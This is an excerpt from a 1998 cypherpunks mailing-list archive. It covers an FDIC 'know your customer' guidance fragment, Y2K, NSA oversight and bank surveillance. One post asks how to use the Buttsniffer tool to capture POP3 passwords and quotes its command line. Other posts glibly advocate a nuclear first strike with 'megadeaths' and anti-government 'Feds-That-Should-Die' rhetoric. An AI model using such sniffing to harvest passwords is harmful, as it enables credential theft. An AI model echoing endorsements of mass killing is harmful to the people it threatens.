                       financial institution will become a victim of
illegal activities perpetrated by a
                       customer. 
                    3.A "<know> <your> <customer>" policy that is
effective will protect the good
                       name and reputation of the financial institution. 
                    4.A "<know> <your> <customer>" policy should not
interfere with the
                       relationship of the financial institution with
its good customers. 

                  At the present time there are no statutory mandates
requiring a "<know> <your>
                  <customer>" policy or specifying the contents of such
a policy. However, in order to
                  develop and maintain a practical and useful policy,
financial institutions should
                  incorporate the following principles into their
business practices: 

                    1.Financial institutions should make a reasonable
effort to determine the true
                       identity of all customers requesting the bank's
services; 
                    2.Financial institutions should take particular care
to identify the ownership of all
                       accounts and of those using safe-custody
facilities; 
                    3.Identification should be obtained from all new
customers; 
                    4.Evidence of identity should be obtained from
customers seeking to conduct
                       significant business transactions; and 
                    5.Financial institutions should be aware of any
unusual transaction activity or
                       activity that is disproportionate to the
customer's known business. 

                  An integral part of an effective "<know> <your>
<customer>" policy is a
                  comprehensive knowledge of the transactions carried
out by the customers of the
                  financial institution. Therefore, it is necessary that
the "<know> <your>
                  <customer>" procedures established by the institution
allow for the collection of
                  sufficient information to develop a "transaction
profile" of each customer. The primary
                  objective of such procedures is to enable the
financial institution to predict with
                  relative certainty the types of transactions in which
a customer is likely to be engaged.
                  Internal systems should then be developed for
monitoring transactions to determine if
                  transactions occur which are inconsistent with the
customer's "transaction profile". A
                  "<know> <your> <customer" policy must consist of
procedures that require proper
                  identification of every customer at the time a
relationship is established in order to
                  prevent the creation of fictitious accounts. In
addition, the bank's employee education
                  program should provide examples of customer behavior
or activity which may
                  warrant investigation. 

                  Identifying The Customer

                  As a general rule, a business relationship with a
financial institution should never be
                  established until the identity of a potential customer
is satisfactorily established. If a
                  potential customer refuses to produce any of the
requested information, the
                  relationship should not be established. Likewise, if
requested follow-up information is
                  not forthcoming, any relationship already begun should
be terminated. 



Structured Transactions

                  Section 103.53 prohibits the structuring of
transactions for the purpose of evading the
                  currency transaction reporting requirements. Anyone
who causes or attempts to
                  cause a bank to fail to file a CTR or to file a false
CTR is covered under this section
                  as well as anyone who attempts to structure or assists
in structuring any transaction
                  with one or more domestic financial institutions. A
cash transaction in excess of
                  $10,000, which is subsequently withdrawn upon
realization that a CTR is being
                  prepared, should be reported as a possible attempt to
structure a transaction. See
                  also 31 U. S. C. 5324. 

                  Examiners should be alert to consecutive transactions
involving cash in excess of
                  $10,000. Suspect transactions should be pursued
further. The following are examples
                  of types of transactions that may be reviewed for
possible structuring activity: 

                    1.Cashed checks - pay particular attention to
multiple items cashed by the same
                       person. 
                    2.Cash deposits. 
                    3.Savings withdrawals/certificates of deposit
redemptions. 
                    4.Personal money orders or official checks sold. 
                    5.Official checks sold or cashed - look for
consecutive items. 
                    6.Savings Bonds sold or redeemed. 
                    7.Traveler's checks sold or cashed. 
                    8.Loan payments or loan proceeds made in cash. 
                    9.Securities sold or purchased for cash if the
financial institution acts as agent for
                       an individual and the transaction involves more
than $10,000.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 26 Nov 1998 02:05:18 +0800
To: cypherpunks@cyberpass.net
Subject: Dr. Strangelove on the Y2K Opportunity
In-Reply-To: <50a20d7167d9f00b008bf7c81c8b6ee0@anonymous>
Message-ID: <v03130315b281ea65b2ab@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 11:45 PM -0800 11/24/98, Jim Burnes - Denver wrote:

>How many nukes are going to be checking the number
>of days since they last talked to launch control?
>What are the chances they are date sensitive?
>What happens if they should lose contact for
>greater than a certain number of days?  Do they
>assume we've been nuked? How about the russians?
>The Chinese?  What if the entire US DOD C&C network
>goes down.  Is it an EMP?  Is it infowar?  Is it
>Y2K?


(in best Dr. Strangelove German accent)

Ah, but vat vud be ze point of a system designed to automatically respond
to a decapitation of command attack, you see, if it could not independently
decide that it must implement its emergency war orders? Vy vud ve have
programmed them if not to let their processors decide?

Zat ist der beauty von dem system, mein fellow Cypherpunks!

(Dr. Strangelove can no longer restrain his excitement and rolls out of the
room in his wheelchair.)

Hundreds of missile silos, dozens of submarines...all with densepacked code
written in the 60s by persons long retired or dead.

All potentially set for Launch on Warning under the Emergency War Orders.

Worse, the Sovs had more primitive systems, more fragile systems, with at
least a couple of accidental launches that we know about (exploded in their
silos). And no money to even maintain their systems, let alone upgrade and
remediate their flawed code.

(There is much evidence that the Sovs also are using this "we may not be
able to control all of our systems" ploy as more leverage for more
bailouts, more handouts, more buyouts of their obsolete technology. "Send
us another $50 billion and we'll promise to spend some of it hiring
programmers to start looking at our Y2K problems...the rest we'll of course
deposit in the Swiss bank accounts set up for our KGB, GRU, Red Army, and
Party apparatchniks. And our Mafia...mustn't forget our Mafia.")

As I have been predicting for most of this year, the smartest thing our DOD
may do is to use the information chaos of Y2K to go for a DECCOM
(Decapitation of Command) strike as the clock hits midnight in Moscow.
Knock out their sub pens on the Kola Peninsula, hit the missile facilities
in Semipalatinsk, knock out Vladivostok, and do a lay down over Moscow.

A one-way ticket back to the 19th century. A few megadeaths may be a
reasonable price to pay, esp. Russkie megadeaths. As the potato chip ad
puts it, "they'll make more."

In any case, the nuclear accident/counterforce strike scenario is just one
of many reasons I plan to be safely at home as Y2K unfolds, with certain
friends and family, stocked up with various supplies and prepared to watch
the fun unfold.

Safely away from large cities and targets.

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@well.com>
Date: Wed, 25 Nov 1998 23:16:24 +0800
To: Jim Burnes - Denver <nobody@nowhere.to>
Subject: Re: Y2K Report Card
In-Reply-To: <50a20d7167d9f00b008bf7c81c8b6ee0@anonymous>
Message-ID: <199811251438.GAA17901@smtp.well.com>
MIME-Version: 1.0
Content-Type: text/plain



At 12:45 AM 11-25-98 -0700, Jim Burnes - Denver wrote:
>> cards to federal agencies.  Three departments 
>> flunked:  Justice; Health & Human Services; and 
>> State.
>
>Wonder what the implications of this are?

HHS? Think Medicare, Medicaid, etc.

-Declan





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ken Williams <jkwilli2@unity.ncsu.edu>
Date: Wed, 25 Nov 1998 23:54:48 +0800
To: "Igor Chudov @ home" <ichudov@Algebra.COM>
Subject: Re: [ISN] Feds Want Banks to Spy on All Customers...Even You!  (fwd)
In-Reply-To: <199811251500.JAA10213@manifold.algebra.com>
Message-ID: <Pine.SOL.4.05.9811251008180.23085-100000@c00985-224wi.eos.ncsu.edu>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

On Wed, 25 Nov 1998, Igor Chudov @ home wrote:

>> Date: Wed, 25 Nov 1998 09:00:29 -0600 (CST)
>> From: "Igor Chudov @ home" <ichudov@Algebra.Com>
>> To: Ken Williams <jkwilli2@unity.ncsu.edu>
>> Cc: cypherpunks@toad.com
>> Subject: Re: [ISN] Feds Want Banks to Spy on All Customers...Even You!  
    (fwd)
>> 
>> Ken Williams wrote:
>> > 
>> > 
>> > -----BEGIN PGP SIGNED MESSAGE-----
>> > 
>> > 
>> > Good thing I keep all my money in a steel case buried somewhere
>> > along the Appalachian trail.  No bank accounts, no credit cards.
>> 
>> That may be good, but your decision is not costless. You are losing
>> all the interest that could accrue on the money and it is constantly
>> diminished by inflation.
>> 
>> Is it worth it? It's your call, but I do not see what you do as something
>> that is unquestionably wise.
>> 
>> igor

Hi,

Actually, the interest that would be earned through savings accounts
and/or any other bank-related investments is insignificant when 
compared to returns on business investments that can be made without
the interference of the banks and government agencies. 

FYI, I was kidding about the money in the steel case on the App Trail, 
but I really do not have any bank accounts or credit cards.  I have
yet to find an honest banker/bank that can be trusted.

Ken

-----BEGIN PGP SIGNATURE-----
Version: PGPfreeware 5.0i for non-commercial use
Charset: noconv

iQEVAwUBNlwe6ZDw1ZsNz1IXAQHR8ggAsozCBphanXiW0ydJk7XJCrEWPib2uTX4
2Y+9KpZoFIc7rMvTrdABv9mTwtY3HgtzNOptQcl/hF0oD1Z2i3+YELRI+4xDu+Qe
vh/9KATLj3bqfUJ7BC2AmQVqK3rpf5MjL8p5x1dpGvDLRU3tW+FQJBi8trfX7pRg
fZVj5V1Ck8VqZhT80LXmewgTlgKlNQIQQzkozFkFtf9jEbjJW4mkWjZErElKFgPn
fGTQKslKK95bb6KQEpS/9Lx1TcRBxSeUnKn8u/TYuTN8Q/NfqiSU+VWMN2+3HGMZ
/qUyy34LTcsgu0N9wNj5NBnHdQ7Cd23aPttJT1ZmRTo+rVe6BGuZIQ==
=Mvxn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Netscape AOL Instant Messenger" <register@oreg-r01.web.aol.com>
Date: Wed, 25 Nov 1998 23:54:29 +0800
To: <cypherpunks@toad.com>
Subject: Welcome to Netscape AOL Instant Messenger (AIM)!
Message-ID: <365C4502@oreg-r01.web.aol.com>
MIME-Version: 1.0
Content-Type: text/plain



Welcome to Netscape AOL Instant Messenger!

Thank you for confirming your Netscape AOL Instant Messenger
account.  We're glad you've joined the fastest growing Internet
online community in the world.

To help maintain an online environment that you feel comfortable
with, you can set your own buddy controls.  You can decide who can
see if you're online as well as who can and can't get in touch
with you while online.

For your convenience, your controls have been initially set to allow
other users to contact you online if they know either your e-mail
address or your screen name.  You may change your buddy controls
any time when signed on to Netscape AOL Instant Messenger by doing
the following:

  (On Windows):
    1) Click on the "Netscape AOL Instant Messenger" button
       and select "Options"
    2) Select "Edit Preferences"
    3) Click on the "Controls" tab

By entering the screennames of people for whom you would like to
set special control settings (e.g., "block" the following users
from contacting me or "allow" the following users to contact me) -
you can maintain an online environment that is comfortable for you.
In the future, you can change your settings by returning to the
"Controls" area.

Thanks for joining Netscape AOL Instant Messenger!  Now you can
instantly chat with your AOL and Internet friends with real-time
text messages!  You can even add your Internet friends to your
Buddy List group.  It's easy and it's FREE!

Remember, to communicate instantly with friends on Internet, they
have to register for Netscape AOL Instant Messenger too.  Invite
your friends to register by sending them a personalized invitation!
Sending an invitation encouraging your friends to join is quick and
convenient.  All you have to do is the following:

    1.  Sign on to Netscape AOL Instant Messenger.
    2.  Click the "Netscape AOL Instant Messenger" button and
        select "Sign On A Friend."
    3.  Enter the e-mail addresses of your friends and co-workers.
We'll send them an invitation -- personalized by you -- inviting
them to join the Netscape AOL Instant Messenger service.

For help and additional information, please visit our website
http://www.netscape.com.
For quick tips on getting started with Netscape AOL Instant Messenger,
see the information below.  See you in cyberspace!

-------------------------------------------
Quick Tips on Getting Started
-------------------------------------------

Signing On to Netscape AOL Instant Messenger

Once you've registered, downloaded, and installed Netscape AOL Instant
Messenger, you're ready to start using it.  Here's what you need to do
to sign on (the following instructions apply to Windows 95/NT):

     1.  First, make sure that you're connected to the Internet
         via your Internet Service Provider, school, or office network.
     2.  Launch Netscape AOL Instant Messenger by double-clicking the
         AOL Instant Messenger program icon. (If you aren't sure how to
         locate Netscape AOL Instant Messenger, click the Start menu and
         then select Programs.  From Programs, select AOL Instant Messenger
         and then the AOL Instant Messenger program icon.)
     3.  When you see the "Sign On" window, type or select the
         screen name and password you chose during registration
         in the space provided and click the "Sign On" button.
     4.  Netscape AOL Instant Messenger will then sign you on.

Setting Up Your Buddy List

Once signed on, you'll see the main Netscape AOL Instant Messenger
window which contains two tabs: a box with names in it, and a row
of buttons at the  bottom.  This box is your Buddy List window,
and it shows you the screen names of your buddies online. Your
Buddy List window will have three sample groups that you can use
to begin organizing your buddies: 1) Buddies; 2) Family, and
3) Co-Workers.  (You can change the names of these groups by
highlighting the group name and typing over it - or just add new
ones.)

Personalize your Buddy List by adding your friends' screen names.
To add a new buddy, click on the "List Setup" tab, click the
"Add Buddy" button, and type a friend's screen name.  Do this for
each buddy you want to add. To add a new group, click the
"Add Group" button, and type the name of the new group (like
"soccer team").  Once you've added your buddies, click the
"Online" tab.

If you can't remember someone's screen name, use the "Find a Buddy"
function to first see if the person is a registered Netscape AOL
Instant Messenger ser or not.  If the person is a registered user,
you can look up his or her screen name here.

Sending Your Buddy an Instant Message

When you see a buddy's name in your Buddy List, it means the person
is online and that you can send your buddy an Instant Message (which
is a private, personalized, text message).

There are two ways to send an Instant Message:

    1) Double-click on your buddy's screen name, and a
       "Send Instant Message" window will appear. Type
       your message in the bottom part of the window, and
       click "Send."  Or,

    2) Highlight your buddy's screen name and click on the
       "IM" button. (If your buddy's screen name is not on your
       Buddy List group, then click on the "IM" button and type
       in his or her screen name and a message.)

Either way, after clicking the "Send" button, your message will
"pop up" on your buddy's computer screen.  Then your buddy can send
messages back to you for an instant, private, one-to-one chat.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Patrick Hinsberger " <P.Hinsberger@globus.net>
Date: Wed, 25 Nov 1998 18:29:28 +0800
To: cypherpunks-unedited@toad.com
Subject: buttsniffer
Message-ID: <365BCFF0.388EBD13@globus.net>
MIME-Version: 1.0
Content-Type: text/plain

Hi folk!

Anybody knows how to use Buttsniffer?
I can listen to ethernet frames in our network, but after a few minutes
I`ve got a huge File with over 50MB...
I read that there is an option to listen only to POP3 password and
so funny things...

At the moment I listen the network with the options :
buttsniff -d 0002 pws.txt e

Please mail me directly!!!

ThanX (and Sorry for my fucKKK English!!!)
-@HiNSe@-
 
 


From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@EINSTEIN.ssz.com>
Date: Thu, 26 Nov 1998 02:50:20 +0800
To: cypherpunks@EINSTEIN.ssz.com (Cypherpunks Distributed Remailer)
Subject: Dr. Strangelove on the Y2K Opportunity (fwd)
Message-ID: <199811251813.MAA30018@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Wed, 25 Nov 1998 09:30:04 -0800
> From: Tim May <tcmay@got.net>
> Subject: Dr. Strangelove on the Y2K Opportunity

> As I have been predicting for most of this year, the smartest thing our DOD
> may do is to use the information chaos of Y2K to go for a DECCOM
> (Decapitation of Command) strike as the clock hits midnight in Moscow.
> Knock out their sub pens on the Kola Peninsula, hit the missile facilities
> in Semipalatinsk, knock out Vladivostok, and do a lay down over Moscow.
> 
> A one-way ticket back to the 19th century. A few megadeaths may be a

That's MEGA-wishful thinking (not to mention more than a tad nuts).

The results of a major nuclear strike would take the human race to a
civilization level more akin to the Sumarians (at best). The ecological,
technological, medical, etc. failures would be impossible to deal with at
our current level of technology.

Potentialy a billion or more people would survive short-term. Nobody in
there right mind would want to trade places with them. Within 20 years the
vast majority of the survivors would be dead. If there would be more than
50M in 60 years over the entire planet I'd be surprised.

If I were setting policy I'd point a bunch/most of my nukes at myself. The
kindest thing I can do for my people is to kill them, the worst thing I
could do for my enemy is leave them alive - they'll eat themselves. Then I'd
sit back and say:

"Fuck with us and we suicide. Oh, we'll take you with us but slowly and by
your own hand."

In the process nuke their major grain belts, water resources, and raw metal
sites, leave their cities and major population centers standing and occupied.

It ain't winnable by either side except by avoidance.



    ____________________________________________________________________
 
             Technology cannot make us other than what we are.

                                           James P. Hogan

       The Armadillo Group       ,::////;::-.          James Choate
       Austin, Tx               /:'///// ``::>/|/      ravage@ssz.com
       www.ssz.com            .',  ||||    `/( e\      512-451-7087
                           -====~~mm-'`-```-mm --'-
    --------------------------------------------------------------------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Thu, 26 Nov 1998 02:01:30 +0800
To: cypherpunks@EINSTEIN.ssz.com
Subject: NSA Scientific Advisory Board
Message-ID: <199811251725.MAA14239@dewdrop2.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain



The NSA Scientific Advisory Board has been functioning
since 1953:

   http://jya.com/nsa-sab97.htm

The 1997 annual report briefly describes what it does and what it 
costs to do it. However, its closed meetings are not announced in 
the Federal Register as required by regulations governing such 
FACA orgs. Names of members, minutes and studies are not 
available. 

We've made a request for info to the NSA office which handles 
the matter (301) 688-6449. 

Any information on the board would be welcome. 

Skimpy annual reports on the NSA SAB, like the one for 1997
above, as well as for all other federal advisory committees, from 
1972 to 1997 are available at:

   http://policyworks.gov/org/main/mc/index-r.htm






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Thu, 26 Nov 1998 06:16:38 +0800
To: cypherpunks@cyberpass.net
Subject: Re: [ISN] Feds Want Banks to Spy on All Customers...Even You!(fwd)
In-Reply-To: <365C3CDB.6F34@lsil.com>
Message-ID: <v03130316b2822643931c@[209.66.100.75]>
MIME-Version: 1.0
Content-Type: text/plain



At 9:22 AM -0800 11/25/98, Michael Motyka wrote:

>BTW - the FDIC site state that there is no statutory requirement for a
>'Know Your Customer' system. You could also say that they are not
>interested in little guys, that they need this stuff to do their job,
>but if the laws are written so that anyone can be targeted without a
>warrant then there is a *big* problem. Especially worrisome is automated
>pattern analysis without a warrant - a violation of the 4th.

This is not at all clear.

If Alice has information about Bob, and the cops seek information from
Alice about Bob, and Alice provides it, Bob cannot generally (as I
understand constitutional law) claim any violation of his Fourth Amendment
protections against unlawful search and seizure.

Now maybe Alice can, if they are her records. (As this transfers the
"papers" she is "secure in" to her.) But not if she gives them up
voluntarily or is subject to other regulations.

Specifically, if the Alice Bank, subject to banking regs and suchlike,
gives up information on Bob the Customer, no Fourth A. issues are likely
involved.

(There may  be contractual issues, if Alice has promised Bob that she won't
give up Bob's secrets, and so on.)

I'm not approving of the Feds examining the records of banks, only noting
that the Fourth is not implicated here. From what I know of the law.

(Legal beagles would probably mutter about a penumbra of the Fourth, an
expectation of privacy, etc.)

--Tim May

"I swear to tell the truth, the whole truth, just the way the President did."
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   831-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@nowhere.to>
Date: Wed, 25 Nov 1998 13:00:26 +0800
To: cypherpunks@cyberpass.net
Subject: Y2K Report Card
Message-ID: <50a20d7167d9f00b008bf7c81c8b6ee0@anonymous>
MIME-Version: 1.0
Content-Type: text/plain



AGENCIES GET NEW REPORT CARDS ON Y2K READINESS


Saying "the picture is a gloomy one," Congressman 
Stephen Horn, chair of the House subcommittee 
responsible for overseeing government progress on
averting the Y2K problem, has given out new report 
cards to federal agencies.  Three departments 
flunked:  Justice; Health & Human Services; and 
State.  The Defense Department gets a D-minus.  
Three departments get A grades:  Small Business 
Administration;  Social Security Administration;
and the National Science Foundation.  The Social 
Security Administration began working on the 
problem in 1989, eight years before most other 
government agencies. 


- USA Today, Nov. 24, 1998





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matthew James Gering <mgering@ecosystems.net>
Date: Thu, 26 Nov 1998 06:58:14 +0800
To: "Cypherpunks (E-mail)" <cypherpunks@cyberpass.net>
Subject: RE: [ISN] Feds Want Banks to Spy on All Customers...Even You!   (fwd)
Message-ID: <5F152E6E8E6FD21195DF00104B2425AD02B2CA@yarrowbay.chaffeyhomes.com>
MIME-Version: 1.0
Content-Type: text/plain




Albert, please do NOT post HTML.

plain-text ASCII with < 80 char wrap ONLY.

	Matt

plain-text version follows:

-----Original Message-----
From: Albert P. Franco, II [mailto:apf2@apf2.com]

> 
>Good thing I keep all my money in a steel case buried somewhere 
>along the Appalachian trail. No bank accounts, no credit cards. 
> 
>Ken Williams 
> 
>>From: ISPI Clips 6.51 
>>From: WorldNetDaily, November 23, 1998 
> 
>Big Brother Banks? FDIC has snooping plans 
>http://www.worldnetdaily.com/bluesky_exnews/19981123_xex_big_brother_.shtml

>David M. Bresnahan, David@talkusa.com 
>Contributing Editor, WorldNetDaily 
> 
>Are you a potential criminal? Are you a threat to banks, airlines, a 
>potential spy, or perhaps an IRS tax protester? The government would like 
>to know and they are about to force banks to be their detectives. 


Isn't this called prior restraint? Isn't it specifically illegal for the
government to treat all members of the public as criminals a priori? 

This certainly sounds like one of the grossest cases of
Feds-That-Should-Die(TM) that I have ever heard. I'm sure that the founding
fathers would have been stocking up on gun powder and lead over this one.
And I'm NOT one of the many Libertarian/Money-Gun-and-Gold-Stashing types on
this list. I far and away prefer to work inside the system peacefully. But,
it does give me pause to think about it! 

When a supposedly NON-LEA agency such as the FuckingDICks begins creating
regulations of this sort it is the most blatant proof that the constitution
has died. Perhaps it is time to start draft the next version of the
Declaration of Independence... Actually, we wouldn't need to change much. It
was an excellent document then and now and perhaps it is time shake the dust
off of it! 

Here's my take on a new version, (read carefully the changes in some cases
are subtle): 


THE DECLARATION of INDEPENDENCE 

------------------------------------------------------------------------ 
Action of the New Continental Consensus, July 4, 1999 
The Declaration of the People of the United States of America 
------------------------------------------------------------------------ 

WHEN in the Course of human Events, it becomes necessary for one People to
dissolve the Political Bands which have connected them with another, and to
assume among the Powers of the Earth, the separate and equal Station to
which the Laws of Nature and of Nature's God entitle them, a decent Respect
to the Opinions of Mankind requires that they should declare the causes
which impel them to the Separation. 

WE hold these Truths to be self-evident, that all Men are created equal,
that they are endowed by their Creator with certain unalienable Rights, that
among these are Life, Liberty, Privacy and the Pursuit of Happiness -- That
to secure these Rights, Governments are instituted among Men, deriving their
just Powers from the Consent of the Governed, that whenever any Form of
Government becomes destructive of these Ends, it is the Right of the People
to alter or to abolish it, and to institute new Government, laying its
Foundation on such Principles, and organizing its Powers in such Form, as to
them shall seem most likely to effect their Safety and Happiness. Prudence,
indeed, will dictate that Governments long established should not be changed
for light and transient Causes; and accordingly all Experience hath shown,
that Mankind are more disposed to suffer, while Evils are sufferable, than
to right themselves by abolishing the Forms to which they are accustomed.
*But when a long Train of Abuses and Usurpation, pursuing invariably the
same Object, evinces a Design to reduce them under absolute Despotism, it is
their Right, it is their Duty, to throw off such Government*, and to provide
new Guards for their future Security. Such has been the patient Sufferance
of these people; and such is now the Necessity which constrains them to
alter their former Systems of Government. The History of the present Federal
Government of the United States of America is a History of repeated Injuries
and Usurpation, all having in direct Object the Establishment of an absolute
Tyranny over these States. To prove this, let Facts be submitted to a candid
World. 

It has refused its Assent to Laws, the most wholesome and necessary for the
public Good. (Agencies such as the NSA and CIA whose actions are wholly
unsupervised and unchecked.) 

It has forbidden its Governors to pass Laws of immediate and pressing
Importance, unless suspended in their Operation till its Assent and
modification should be obtained; and when so suspended, it has utterly
neglected to attend to them. (Bastardization of state and local voters
measures threw inappropriate judiciary interference.) 

It has refused to pass other Laws for the Accommodation of large Districts
of People, unless those People would relinquish the Right of Representation
in the Legislature, a Right inestimable to them, and formidable to Tyrants
only. (Pick any agency... none allow for direct representation in their
regulatory actions. Public comment IS NOT direct representation!) 

It has called together Legislative Bodies at Places unusual, uncomfortable,
and distant from the Depository of their public Records, for the sole
Purpose of fatiguing them into Compliance with its Measures. 

It has investigated, harassed, terrorized, and killed members of
Representative Bodies repeatedly, for opposing with its manly Firmness its
Invasions on the Rights of the People. 

It has refused for a long Time, after such Dissolution, to allow others to
act; whereby the Legislative Powers, incapable of the Annihilation, have not
been returned to the People at large for their exercise; the State remaining
in the mean time exposing them to all the Dangers of Invasion from it, and
the Convulsions within. 

It has endeavored to prevent the Population of these States; for that
Purpose obstructing the Laws for Naturalization of Foreigners; refusing to
pass others to encourage their Migrations hither, and raising the Conditions
of new ownership of Lands and Properties. 

It has obstructed the Administration of Justice, by refusing its Assent to
Laws for respecting Judiciary Powers. (You can't sue them unless they say
it's OK... And when you do who do you sue?) 

It has made Judges dependent on its Will alone, for the Tenure of their
Offices, and the Amount and Payment of their Salaries. 

*It has erected a Multitude of new Offices, and sent hither Swarms of
Officers to harass our People, and eat out their Substance.* 

It has kept among us, in Times of Peace, Standing Armies, without the
consent or oversight of our Legislatures. (NSA, CIA, IRS, ATF, etc.) 

It has affected to render the Military and National Security Forces
independent of and superior to the Civil Power. 

*It has combined with others to subject us to a Jurisdiction foreign to our
Constitution, and unacknowledged by our Laws; giving its Assent to their
Acts of pretended Legislation:*

FOR quartering large Bodies of Armed Troops among us; 

FOR protecting them, by a mock Trial, from Punishment for any Murders which
they should commit on the Inhabitants of these States: 

FOR cutting off our Trade with all Parts of the World: (ITAR, etc.) 

FOR imposing Taxes on us without our Consent: 

FOR depriving us, in many Cases, of the Benefits of Trial by Jury: (Try to
fight an "infraction" in California!) 

FOR transporting us beyond Seas to be tried for pretended Offences: (Hi CJ!)


FOR abolishing the free System of English Laws in a neighboring Province,
establishing therein an arbitrary Government, and enlarging its Boundaries,
so as to render it at once an Example and fit Instrument for introducing the
same absolute Rules into these Colonies: (Ever been to a US territory?) 

FOR taking away our Charters, abolishing our most valuable Laws, and
altering fundamentally the Forms of our Governments: (Let's hear it for the
IRS and NSA, and now FDIC!) 

FOR suspending our own Legislatures, and declaring themselves invested with
Power to legislate for us in all Cases whatsoever. (Who actually makes tax
regulation?!) 

It has abducted Government here, and declared us under of its Protection and
thus waging War against us. 

It has plundered our Seas, ravaged our Coasts, burnt our Towns, and
destroyed the Lives of our People. 

It is, at this Time, transporting large Armies of Mercenaries to complete
the Works of Death, Desolation, and Tyranny, already begun with
circumstances of Cruelty and Perfidy, scarcely paralleled in the most
barbarous Ages, and totally unworthy of a civilized Nation. 

It has constrained our fellow Citizens taken Captive to bear Arms and false
testimony against their Countrymen, to become the Executioners of their
Friends and Brethren, or to fall themselves by their Hands. 

It has excited domestic Insurrections amongst us, and has endeavored to
bring on the Inhabitants of our Frontiers, the merciless Profiteering Drug
Peddlers, whose known Rule of Warfare, is an undistinguished Destruction, of
all Ages, Sexes and Conditions. (Don't forget Noriega and his CIA buddies.
You wouldn't get even money on the bet that they have changed their ways...)


It has subverted the very essence of the Constitution and Bill of Rights
which gave it birth by perpetrating the following acts of barbarism and
contempt for the people: 

Confiscation of Personal Properties being routinely executed without the
most minimum attempt at DUE PROCESS; 

Routine and massive warrant-less searches and seizures of the personal
communications of the people; 

Commonplace denial of competent legal defense and availability of juries of
one's peers; 

Unconstitutional restrictions of the movement of the people and their
assets; 

Unconstitutional restrictions of the peoples' right to assemble, publicly
and privately and secretly; 

IN every stage of these Oppressions we have Petitioned for Redress in the
most humble Terms: Our repeated Petitions have been answered only by
repeated Injury and imprisonment in State Mental Institutions. A Prince,
whose Character is thus marked by every act which may define a Tyrant, is
unfit to be the Ruler of a free People. 

NOR have we been wanting in Attentions of our International Brethren. They
have warned us from Time to Time of Attempts by our Legislature to extend an
unwarrantable Jurisdiction over them. They have reminded us of the
Circumstances of our Emigration and Settlement here. They have appealed to
our native Justice and Magnanimity, and they have conjured us by the Ties of
our common Kindred to disavow these Usurpations, which, would inevitably
interrupt our Connections and Correspondence. They too have been denied the
Voice of Justice and of Consanguinity. We must, therefore, acquiesce in the
Necessity, which denounces our Union in the Spirit of Freedom, and hold
them, as we hold the rest of Mankind, Enemies in War, in Peace, Friends. 

WE, therefore, the People of the UNITED STATES OF AMERICA, in GENERAL
CONSENSUS, Assembled, appealing to the Supreme Judge of the World for the
Rectitude of our Intentions, do, in the Name, and by Authority of the good
People of these States, solemnly Publish and Declare, That these United
States are, and of Right ought to be, FREE AND INDEPENDENT STATES; that they
are absolved from all Allegiance to the Federal Government, and that all
political Connection between them and the Federal Government of the USA, is
and ought to be totally dissolved; and that as FREE AND INDEPENDENT STATES,
they have full Power to levy War, conclude Peace, contract Alliances,
establish Commerce, and to do all other Acts and Things which INDEPENDENT
STATES may of right do. And for the support of this Declaration, with a firm
Reliance on the Protection of divine Providence, we mutually pledge to each
other our Lives, our Fortunes, and our sacred Honor. 

Signed, 

The names of course will be changed to protect the innocent... 

I may not be up to the task of editing TJ, but you get the point! 

I was going to send this through an anonymizer and sign it Thomas In Payne.
But Fuck the MIBs. This is MY Opinion Freely Stated as I'm guaranteed by the
Constitution they are so hell bent on destroying. This adaptation of such a
revered document as our dear Declaration of Independence is meant to provoke
thought and perhaps one last effort by many to halt the erosion of the
effectiveness of what was perhaps the most important statement of what a
government should be that the world has ever known. It is time that we take
back our Constitution from the MIB. 

My only question is HOW? 

APF 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@Algebra.COM (Igor Chudov @ home)
Date: Thu, 26 Nov 1998 05:14:33 +0800
To: tcmay@got.net (Tim May)
Subject: Re: Dr. Strangelove on the Y2K Opportunity
In-Reply-To: <v03130315b281ea65b2ab@[209.66.100.75]>
Message-ID: <199811252016.OAA13071@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text



Tim May wrote:
> Worse, the Sovs had more primitive systems, more fragile systems, with at
> least a couple of accidental launches that we know about (exploded in their
> silos). And no money to even maintain their systems, let alone upgrade and
> remediate their flawed code.
...

> As I have been predicting for most of this year, the smartest thing our DOD
> may do is to use the information chaos of Y2K to go for a DECCOM
> (Decapitation of Command) strike as the clock hits midnight in Moscow.
> Knock out their sub pens on the Kola Peninsula, hit the missile facilities
> in Semipalatinsk, knock out Vladivostok, and do a lay down over Moscow.
> 
> A one-way ticket back to the 19th century. A few megadeaths may be a
> reasonable price to pay, esp. Russkie megadeaths. As the potato chip ad
> puts it, "they'll make more."

I don't quite understand this.

Look at this from the standpoint of the person in control of the American
arsenal. The goal of this person, to me, seems to be prevention of American
deaths (perhaps by a threat of mutual annihilation).

You say that there is a possibility of a scenario A that some Russian
missiles may be launched accidentally, without a first attack from the US.

